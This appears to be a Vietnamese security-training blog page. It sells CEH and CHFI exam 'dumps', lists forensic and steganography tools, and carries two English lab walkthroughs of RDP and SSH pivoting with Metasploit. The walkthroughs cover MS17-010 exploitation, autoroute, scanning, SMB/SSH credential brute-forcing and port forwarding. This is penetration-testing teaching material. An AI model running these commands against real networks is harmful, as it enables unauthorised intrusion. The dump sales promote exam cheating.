Powered by Blogger.

Bài Mới ...

TÀI LIỆU ÔN LUYỆN THI CEH V10 VÀ CHFI V9 DỄ ĐẬU

Written By Akademy on Friday, May 10, 2019 | May 10, 2019

KHUYẾN MÃI BỘ DUMP VIP THI CEH V10 & CHFI V9 CHO CÁC BẠN CHỈ CÒN 1.500.000 VND / BỘ (KHI ĐĂNG KÍ "COMPO" TÀI LIỆU LUYỆN THI CEH V10 + CHFI V9)

TÀI LIỆU ÔN LUYỆN THI BAO GỒM :
1 / CEH V10 : 1750 k
CEH V10 : BỘ ĐỀ PRE CEH V10 614 CÂU
EXAM CEH V10 300+ CÂU
TÀI LIỆU OFFICIAL SLIDE CEH V10 CỦA ECC
VÀ MỘT SỐ HƯỚNG DẪN NÊN TẢNG & CHIA SẼ CỦA NGƯỜI ĐÃ THAM DỰ KÌ THÌ NHƯ ĐĂNG KÍ Ở ĐÂU, THỦ TỤC CỦA SECURITY365 ...

CHFIV9 2000K
CHFI V9 : BỘ ĐỀ ÔN THI CHFI V9 HƠN 300 CÂU
SECURITY365 DUMP VIP CHFI V9 200 + CÂU
TÀI LIỆU SLIDE CHFI V9 OFFICIAL
10 GIỜ VIDEO ÔN TẬP VỚI NHỮNG CHIA SẼ VÀ HƯỚNG DẪN TỐT.

SECURITY365 ĐÃ ÔN LUYỆN CHO HÀNG TRĂM THÍ SINH VÀ THI THÀNH CÔNG CEH + CHFI

HƯỚNG DẪN MUA TÀI LIỆU ÔN THI CEH V10 & CHFI V9

XEM CHI PHÍ CỦA TÀI LIỆU CỦA MUA NHƯ CEH V10 : 1750K , CHFI V9 : 2000 K (COMPO 3000 K) VÀ THANH TOÁN CHI PHÍ ĐẾN STK :


Chủ tài khoản : Nguyễn Thị Quỳnh Viên

Số tài khoản :

Ngân hàng VCB chi nhánh Bình Thạnh : 018 1000 525399

Ngân hàng TCB chi nhánh Daklak : 19030938645016


! THÔNG TIN EMAIL , SỐ ĐIỆN THOẠI VÀ ĐỊA CHỈ NHẬN TÀI LIỆU ĐẾN EMAIL CSIRT247@GMAIL.COM. TÀI LIỆU SẼ GỒM 1 BẢN PDF, VCE GỞI QUA EMAIL TRONG VÒNG 8 TIẾNG LÀM VIỆC. VÀ 1 BẢN IN GỞI ĐẾN ĐỊA CHỈ CTY HAY NHÀ RIÊNG TRONG VÒNG 48 TIẾNG LÀM VIỆC



Win Forensic : Bộ Công Cụ Tích Hợp Trên Máy Ảo Dễ Dùng

Written By Akademy on Tuesday, March 12, 2019 | March 12, 2019

http://akademy.edu.vn/computer-forensic/win-forensic-bo-cong-cu-tich-hop-tren-may-ao-de-dung/

Nhằm hỗ trợ cho các điều tra viên trong qua trình phân tích và điều tra chứng cứ số tôi tổng hợp các công cụ digital forensic thông dụng trên một máy ảo là winforensic cùng với các hướng dẫn cơ bản.
Bộ công cụ này rất hữu ích cho những ai đang học và nghiên cứu về CHFI hay thường xuyên phải tiến hành điều tra số. Sau đây là những ứng dụng mà tôi đã tổng hợp và sẽ gởi đến những ai quan tâm cách sử dụng.

WinForensic chạy trên máy ảo Vmware sẽ giúp cho các bạn điều tra viên thuận tiện hơn trong quá trình điều tra và truy tìm chứng cứ số. Để chạy WinForensic các bạn hãy download và cài đặt ứng dụng Vmware Player bản mới nhất.

Tải máy ảo Win Forensic tại đây : https://bit.ly/2HrnYBw

Ngoài máy ảo Win Forensic các bạn còn có thể tải các tool chuyên dùng cho CHFI v9 của EC-Council tổng hợp và chia sẽ.

Các công cụ mạnh mẽ & thông dụng nhất được tích hợp trên máy ảo này bao gồm :
  1. FTK Imager : Đây là công cụ số 1 về thu thập dữ liệu và phân tích dữ liệu thu thập. Có thể đọc được cả dữ liệu vmdk và mount thành ổ đĩa logic để điều tra viên tiến hành phục hồi dữ liệu, phân tích , dò tìm chứng cứ số
  2. Autopsy : Ứng dụng miễn phí chuyên dùng cho việc phân tích và dò tìm hình ảnh , nó có thể moi ra các hình mà kẻ xấu dấu trong slack space, dấu trong các định dạng phi chuẩn và xóa. Rất tuyệt vời
  3. Sysinternal Suite : Bộ các ứng dụng mạnh mẽ và miễn phí của Microsoft với các khả năng dò quét autorun, truy xuất tiến trình, xem công mở   hay các session đang hoạt động …
  4. Volatility & Redline: Ứng dụng miễn phí chuyên cho việc phân tích bộ nhớ động máy tính. Hiện nay, vẫn chưa có tool nào cho dù là thương mại có thể qua mặt được volatility trong lĩnh vực phân tích và dò tìm mã độc, truy tìm chứng cứ trong bộ nhớ. Kết hợp thêm với Redline để tìm malware thì rất là hiệu quả.
  5. CrowdResponse : Là ứng dụng nằm trong Top 7 công cụ Forensic trên thế giới, với tên gọi cũng đủ nói lên khả năng đáp ứng cho nhiều tình huống xấu nhất.
  6. WinUFO : Một chuyên gia đã từng làm việc tại IBM trong lĩnh vực điều tra số đã nhận thấy nhiều công cụ trị giá cả chục ngàn $ thật ra có thể sử dụng không tốn xu nào. Thật vậy, nếu chúng ta biết cách tích hợp và phối hợp những công cụ miễn phí với nhau. Vì thế ông ta đã nghĩ việc mở 1 công ty chuyên về điều tra số và xây dựng nên bộ WinUFO cho các bạn sử dụng. Hơn 120 công cụ mạnh.
  7. HashCal : Ứng dụng tính toán giá trị băm miễn phí có khả năng tính hầu hết các thuật toán băm hiện nay.
  8. DeepSound : Công cụ che dấu thông tin vào dữ liệu âm thanh mà trog phim Mr Robot được siêu hacker Elliot sử dụng, cùng với các ứng dụng QucikStego và Stega … là những chương trình cần phải có trong kho vũ khí Digital Forensic của mình.
  9. Hex Workshop & WinHex : Một trong những cách che dấu thông tin rất nhanh chóng và hiệu quả là dịch chyển bit hay xoay bit, và chúng ta có thể thực hiện thông qua Hex Workshop rất dễ dàng, ngoài ra Hex Workshop còn nhiều khả năng mạnh mẽ tương tự như WinHex .
  10. Wireshark : Ứng dụng số 1 trong 125 công cụ bảo mật Wireshark không thể thiếu trong bất kì danh sách nào, có nhiều điều các bạn chỉ thấy đươc khi nhìn qua lăng kính Wireshark.
  11. Xarp / Netcut / Cain : Nếu có kẻ xấu trên mạng đang cố tình chôm dữ liệu bí mật của chúng ta, các bạn có thể phát hiện ra và “chơi” lại một cách hợp pháp với bộ 3 Xarp + Cain & Netcut …
Sẽ bổ sung thêm các ứng dụng hữu ích khác cho lĩnh vực điều tra số như OSForensic,Passmark, Network Miner, Bulk_Extractor … sau khi thử nghiệm tính tương thích và độ ổn định khi chạy trên Win Forensic.

Sau khi tải về hãy mở bằng máy ảo Vmware Player và đăng nhập với mật khẩu security365. Mật khẩu giải nén là security365.

Nguyễn Trần Tường Vinh
Founder & Instructor tại Akademy EDU

Ẩn Thông Tin Như Mr Robot với DeepSound – Audio Steganography Tool

Written By Akademy on Thursday, March 7, 2019 | March 07, 2019

DeepSound là một công cụ audio steganography và chuyển đổi âm thanh nhằm ẩn dữ liệu bí mật vào các tệp âm thanh như trong phim Mr Robot. Ngoài ra ứng dụng cũng cho phép bạn trích xuất các tệp bí mật trực tiếp từ các tệp âm thanh hoặc từ các bản nhạc  hay CD.
DeepSound - Audio Steganography Tool

DeepSound  hỗ trợ mã hóa các tệp bí mật bằng AES-256 (Tiêu chuẩn mã hóa nâng cao) để cải thiện bảo vệ dữ liệu. Ngoài ra, ứng dụng này cò cón Audio Converter Module dễ sử dụng, có thể mã hóa một số định dạng âm thanh (FLAC, MP3, WMA, WAV, APE) cho đến các loại khác (FLAC, MP3, WAV, APE).

Hướng Dẫn Sử Dụng DeepSound Audio Steganography Tool

  • Click  ‘Open carrier files (F2)’  hay drag & drop audio file (flac, wav, wma, mp3, ape) đến dành sách Carrier audio files.
  • Click  vào ‘Add secret files (F3)’  hay drag & drop secret  tập tin trong danh sách Secret files  trên bottom side của ứng dụng.
  • Nhấn phím F4  hay click vào  nút ‘Encode secret files’ .
  • Ta có thể chọn định dạng xuất của file  (wav, flac hay ape). DeepSound không hỗ trợ định dạng xuất wma. Do đó nếu muốn dấu dữ liệu mật vào tập tin  wma ta cần dùng tool để chuyển đổi
  • Trong hộp thoại ‘Encode secret files’ ta có thể  bật hay tắt mã hóa  AES-256 ..
  • Click  vào nút ‘Encode secret files’  để bắt đầu tiến trình.
Download DeepSound tại đây :DeepSoundSetup.msi
Hoặc xem thêm tại đây (here.)

Nâng Cấp tài khoản Hacker Mũ Xám hay CEH v9 lên CEH v10

Chào các bạn thành viên các lớp CEH v9 & Hacker Mũ Xám. Theo quy định mới thì các tài khoản sẽ có thời hạn 1 năm hoặc 3 năm cho gói VIP. Tuy nhiên các tài khoản các bạn đăng kí từ năm 2017, 2018 vẫn giữ nguyên hiệu lực đến hết năm 2019.

Tuy nhiên, nếu các bạn muốn enroll vào group của lớp CEH v10 {sẽ có tool + dump CEH v10, giáo trình chính thức của ECC để xem online và tham gia các buổi Live của CEH v10 trong năm 2019) cần đóng thêm một khoản phí nhỏ là 500.000 VND}.


Ngoài ra, để ghi nhớ sự hỗ trợ và tham gia của các thành viên cũ, các chương trình mới sẽ giảm giá 20 % cho tất cả các bạn nào muốn tham gia. Hãy liên hệ admin qua @ https://www.facebook.com/vosimaytinh

Đóng phí giá hạn và nâng cấp tài khoản hãy thanh toán qua :
Chủ tài khoản : Nguyễn Thị Quỳnh Viên.
Số tài khoản
  • Ngân hàng VCB chi nhánh Bình Thạnh : 018 1000 525399
  • Ngân hàng ACB chi nhành Buôn Ma Thuột  : 163969559
  • Ngân hàng TCB chi nhánh Daklak : 19030938645016
Hệ thống quản lý học liệu : http://www.akademy.edu.vn

Share this article :
Share

Cần Chuẩn Bị Gì cho Nghề An Ninh Mạng Trong Năm 2019 để từ "Zero lên Hero" ?


Chào các bạn, trong năm mới ta nên đề ra vài mục tiêu nho nhỏ bên cạnh mục tiêu to là kiếm Tiền. Sự chuẩn bị ở đây không có gì to tát nhưng tốn kém và hiệu quá. Và nếu không từ Zero đến Hero được thì tới Zero + cũng OK rồi !

Trang bị về phần cứng nên có :
         Đã học là phải hành, có nghĩ là phải thực hành trên Lab ảo thật nhiều. Nhưng nếu các bạn chạy lab ảo trên ở thường sẽ không nhanh bằng SSD nên chúng ta cần đầu tư 1 box SSD chưa lab và chạy máy ảo cho ngon. 

Hãy lên tiki hay các trang để tìm ổ cứng SSD giá tốt, nên dùng ổ 500GB (nếu không thì 250GB), ổ di động càng tốt. Nếu ổ thường thì mua cái box gắn vào, tôi không biết có ổn không nhưng chắc là được.  Trước đây tôi hay mua Lazada nhưng bị lừa vài lần nên rút kinh nghiệm vậy !

Bên cạnh đó nên trang bị 1 con crad Wifi thật xịn, như là Alfa AHUS hay bét nhất phải là TpLink WN722 v1, hoặc cao hơn chút là DWA 182 Wifi.
Chịu chơi hơn là phải có NANO Wifi Pinaple, trong group chúng ta có nhiều bạn xài tới hàng Tetra, còn tôi thì chơi tới 2 cái chỉ để nhìn cho đẹp đội hình.

Dữ hơn nữa là phải có mấy con malware dạng hardward, ai đó có kỹ thuật thí tự làm 1 con còn nhưng bạn có $ nhưng không có thời gian thì thích mua luôn và có các hãng chuyên bán như Hak5. 

Và độc hơn nữa là kiếm 1 con chuyên hack sóng hồng ngoại như HackerOne, cái này trên eBay có bán.

... Còn nữa, nên sắm 1 con USB xịn để cài sẳn tool Kali Linux 2019 nhằm mục đích chiến ở bất kì nơi nào hoặc có thể pentest, dò lỗi ở bất kì đâu (cần phải cài thêm tool như OpenVas, Nessus)

Đồ chơi để hack thì có rồi, nhưng đồ chơi để secure thì thế nào ? Các bạn thử tìm xem trên PwnieExpress nó có bán hàng đỉnh để dò tìm mấy cái đồ chơi độc hại ở trên, nhưng mua cần phải tìm hiểu thêm.

P/R luôn : Hiện trung tâm đang chạy lại các lớp đào tạo Live với chương trình khuyến học 3 in 1.

Đó là về các thiết bị nho nhỏ về mặt phần cứng và phần mềm chỉ cần tầm 1000 $ trở lại là sắm FULL ! Còn về mặt "phần xám" thì có tiền cũng không mua được, mà ngoài $ ta cần phải học tập rèn luyện chuyên cần, đôi khi phải có người hướng dẫn, người đi trước chỉ đường (ví dụ đứng ở ngã 3 chỉ cần chỉ đúng hướng phải hay trái là đủ giá trị rồi, còn đi ngược lại thì ai cũng biết rồi đấy, trong năm qua tôi cũng may mắn chỉ đúng hướng cho một số bạn)

Vậy trong năm này các bạn nên đặt một mục tiêu nho nhỏ cho phần xám hay chất xám là lấy 1 chứng chỉ quốc tế nào đó (có sự hỗ trợ từ công ty đang làm thì càng tốt). Cái chứng chỉ nho nhỏ đó có thể là (ở đây tôi đưa từ thấp đến cao theo ý kiến của mình)

1 - Comptia Security+ SY0 - 501 : Đây là sự khởi đầu tốt cho bất kì ai, tôi đã đề pa với chứng chỉ này từ nằm 2003 và giờ ngắm nhìn nó vẫn thấy thích, lần đầu tiên thi đậu sau những ngày cố gắng và bỏ thời gian ôn luyện ở Vũng Tàu. Ngoài ra, các cert xịn của Comptia còn có Pentest + và CySA+ , hãy tùy cơ ứng biến hay nói như kiểu VN là "liệu cơm mà gắp mắm", hãy xác định cái nào cần cho công việc của mình trước.

2 - CEH v10 : Đây là chứng chỉ giá trị nằm trong base Cert của Bộ Quốc Phòng Mỹ, DOD họ  không đánh giá sai đâu các bạn. Nếu học cho ra ngô ra khoai món này thì từ Zero lên đến Hero luôn, và CEH VIETNAM đang phấn đấu đào tạo mọi người theo learning Path như vậy.

3 - CHFI v9 : cert này nằm trên cert CEH v10 một ít, nếu các bạn đã trãi qua thì sẽ hiểu rõ sự trên cơ của nó. Nhiều người chủ quan luyện tập theo dump và đã ôm hận khi vào phòng thi. Nhưng nêu luyện kỹ, học bài bản theo giáo trình, sữa cả những câu đã trả lời sai, luyện tập flashcard và dump xịn thì khả năng pass khá cao. Tôi hơi bị tự hào là vừa qua ôn luyện cho 7 bạn theo hướng này đều pass hết, nhưng cũng phải nói là 7 bạn này đã giỏi sẳn rồi, học chỉ để đốt giai đoạn và rút ngắn thời gian thôi. Nhưng nói vậy để mọi người yên tân vào chất lượng đào tạo.

Ngoài ra, ECC còn có các chứng chỉ như ECSA và đỉnh cao LPT mà nhiều người mong ước, nhưng muốn học và thi ECSA các bạn phải trãi nghiệm CEH đã, không thể đốt giai đoạn này được vì đ1o là quy định của EC-Council

4 - OSCP : Đây là chứng chỉ đang lên và cũng đang được đánh giá cao cũng như ưa chuộng còn hơn cả CEH tại nhiều khu vực, và ngeh đâu cũng được DoD của Mỹ đưa vào base Cert của họ. Để học và thi món này ta cần vững vàng trong thao tác hacking với Kali Linux, nói chung là cứ phải làm lab thật là nhiều cho quen với thao tác. Việt Nam hiện nay cũng có khá nhiều bạn thi đạt OSCP, và một số ít còn có chứng chỉ nâng cao hơn là OSCE.

5 - CISSP : cùng với các chứng chỉ thiên về quản lý và hoạch định khác như CISA, CCSP ... thì CISSP là niêm mong ước của rất nhiều người. Nó như sự mở rộng của Security+ nhưng mở khá rộng, và sâu hơn chút nữa nên làm cho nhiều bạn gặp khá nhiều khó khăn và trở ngại. 

Nhưng bạn nào có cả CISSP và CEH / OSCP thì đúng là "Văn Võ Song Toàn", nhưng nên có thêm CHFI hay các chứng chỉ Forensic của SANS thì mới đúng là "cao thủ võ lâm". Thật vậy, đừng nên qua tự hào khi mà không biết làm cách nào để "moi" 1 con malware nằm trong bộ nhớ hay làm sao thấy được trafic "lạ" ở trên mạng (đây là các kỹ năng thuộc về Computer Forensic). Giống như khi chúng ta có chứng chỉ đầy mình nhưng gặp câu hỏi : Bạn có chắc là máy của bạn không có malware hay không ? thì rất hoang mang và trả lời hơi lí nhí thiếu tự tin. 

Mặc dù không ai có thể có câu trả lời quyết đoán cho câu hỏi này trừ khi chúng ta tắt máy và chôn xuống đất (nghe hơi quá nhưng sự thật là thế), nhưng cũng phải có được phương án hành động hay quy trình thực hiện để chứng mình hay dò tím malware thích hợp.

Như vậy, về mặt kiến thức thì cần có mục tiêu mà mục tiêu nào rõ ràng hơn là bằng cấp đã được chứng nhận.

Các ý kiến trên đây là về mặt cá nhân, và có thể thay đổi, hiệu chỉnh khi thấy thích hợp.

Các bạn có thể trang bị về "Phần Xám" của mình qua các khóa học tại CEH VIETNAM (có live) hay chỉ cần đăng kí học Learning Anytime qua Akademy http://www.akademy.edu.vn

Các bạn có thể trao đổi thêm với tôi về mục đích của mình (ý là muốn học cái gì hay thì lấy chứng chỉ nào) qua Facbook https://www.facebook.com/dongduonggiaochu
Hoặc cần đăng kí và tư vấn khóa học qua Admin https://www.facebook.com/vosimaytinh

Group thảo luận về An Ninh Mạng Security365 https://www.facebook.com/groups/dongduongict/
All in One http://akademy.edu.vn/courses/all/





RDP Pivoting with Metasploit

Written By Akademy on Wednesday, March 6, 2019 | March 06, 2019

From Offensive Security
http://akademy.edu.vn/course/hacking-withkali-linux-2019/
Pivoting is a technique to get inside an unreachable network with help of pivot (center point). In simple words, it is an attack through which an attacker can exploit that system which belongs to the different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then the attacker will able to target the client system for the attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (server): window operating system with two network interface
Target Machine (client): window 7 (Allow RDP service)
Use exploit MS17-010 or multi handler to hack the pivot machine and bypass its UAC to achieve admin privileges.
1sessions
Hence if you will count then currently attacker has hold 2 sessions, 1st for meterpreter shell and 2nd for bypass UAC of the server.
Check the network interface through the following command:
1meterpreter> ifconfig
From the given image you can observe two networks interface in the victim’s system 1st for IP 192.168.0.27 through which the attacker is connected and 2nd for IP 192.168.100.100 through which clients (targets) are connected.
Since the attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface, therefore, it is not possible to directly make an attack on client network until unless the attacker acquires the same network connection. In order to achieve 192.168.100.0 network attacker need to run the post exploitation “autoroute”.
This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. The default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
123msf > use post/multi/manage/autoroute msf post(autoroute) > set session 2msf post(autoroute) > exploit
Note: If you had not to bypass UAC you can use session 1 for post exploit.
This Module will perform an ARP scan for a given IP range through a Meterpreter Session.
12345use post/windows/gather/arp_scannermsf post(arp_scanner) > set rhosts 192.168.100.100-110msf post(arp_scanner) > set session 2msf post(arp_scanner) > set threads 20msf post(arp_scanner) > exploit
Here we found a new IP 192.168.100.103 as shown in the given image. Let’s perform TCP port scan for activated services on this machine.
This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
12345use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > set ports 445,3389msf auxiliary(tcp) > set rhosts 192.168.100.103msf auxiliary(tcp) > set threads 10msf auxiliary(tcp) >exploit
From given you can observe port 3389 and port 445 are open and we know that 3389 is used for RDP and 445 is used for SMB.
This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
123456use auxiliary/scanner/smb/smb_loginmsf exploit (smb_login)>set rhosts 192.168.100.103msf exploit (smb_login)>set user_file /root/Desktop/user.txtmsf exploit (smb_login)>set pass_file /root/Desktop/pass.txtmsf exploit (smb_login)>set stop_on_success truemsf exploit (smb_login)>exploit
 From the given image you can observe the highlights pentest: 123 has success login.
Now Type the following command for port forwarding on localhost.
1meterpreter> portfwd add –l 3389 –p 3389 –r 192.168.100.103 
-l: This is a local port to listen on.
-p: The remote port to connect on.
-r:  The remote host address to connect on.
Now type the following command to connect RDP client on localhost through port 3389
1rdesktop 127.0.0.1:3389
Now it will ask to enter the credential for connecting with RDP client; Enter the combination of username and password you have retrieved from SMB login Exploit.
If you remembered we have retrieved pentest: 123 through smb login exploit which we are using for login.
Wonderful!! We had successfully exploited the RDP client.

SSH Pivoting using Meterpreter

Pivoting is a technique to get inside an unreachable network with help of pivot (center point). In simple words, it is an attack through which an attacker can exploit that system which belongs to the different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then the attacker will able to target the client system for the attack.
http://akademy.edu.vn/course/hacking-withkali-linux-2019/
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
12345msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > set rhosts 192.168.0.109msf auxiliary(ssh_login) > set username rajmsf auxiliary(ssh_login) > set password 123msf auxiliary(ssh_login) > exploit
From the given image you can observe that command shell session 1 opened
Now convert command shell into the meterpreter shell through the following command
1sessions –u 1
From the given image you can observe that Meterpreter session 2 opened
1sessions
Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for the meterpreter shell of the SSH server.
Check network interface using ifconfig command
From the given image you can observe two network interface in the victim’s system 1st for IP 192.168.0.109 through which the attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.
Since the attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface, therefore, it is not possible to directly make an attack on client network until unless the attacker acquires the same network connection. In order to achieve 192.168.10.0 network attacker need to run the post exploitation “autoroute”.
This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. The default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
1234msf > use post/multi/manage/autoroute msf post(autoroute) > set subnet 192.168.10.0msf post(autoroute) > set session 2msf post(autoroute) > exploit
This time we are exploiting SSH ignite (local client) therefore we are going to use the same module for it that had used above for SSH raj, only need to change information inside exploit.
12345msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > set rhosts 192.168.10.2msf auxiliary(ssh_login) > set username ignitemsf auxiliary(ssh_login) > set password 1234msf auxiliary(ssh_login) > exploit
From given image, you can see another command shell 3 opened if you will count then total attack has hold 3 sessions, two for SSH server and one for the SSH client.
1sessions
  1. Command shell for SSH raj (192.168.0.109:22)
  2. Meterpreter shell for SSH raj (192.168.0.109)
  3. Command shell for SSH ignite (192.168.10.2:22)
1sessions 3
Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.
1ifconfig
From given, you can observe the network IP is 192.168.10.2

Pentester Lab

Xem thêm »

[OWASP] Web Hacking

Xem thêm ... »

(OSCP) Pentest v/s Kali Linux

Xem thêm ... »
 
Trung Tâm Đào Tạo An Toàn Thông Tin Thao Trường Mạng Online Là Gì | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. CEH VIỆT NAM - All Rights Reserved
Web Master @ AM4W@NH
Contact @ Đông Dương Giáo Chủ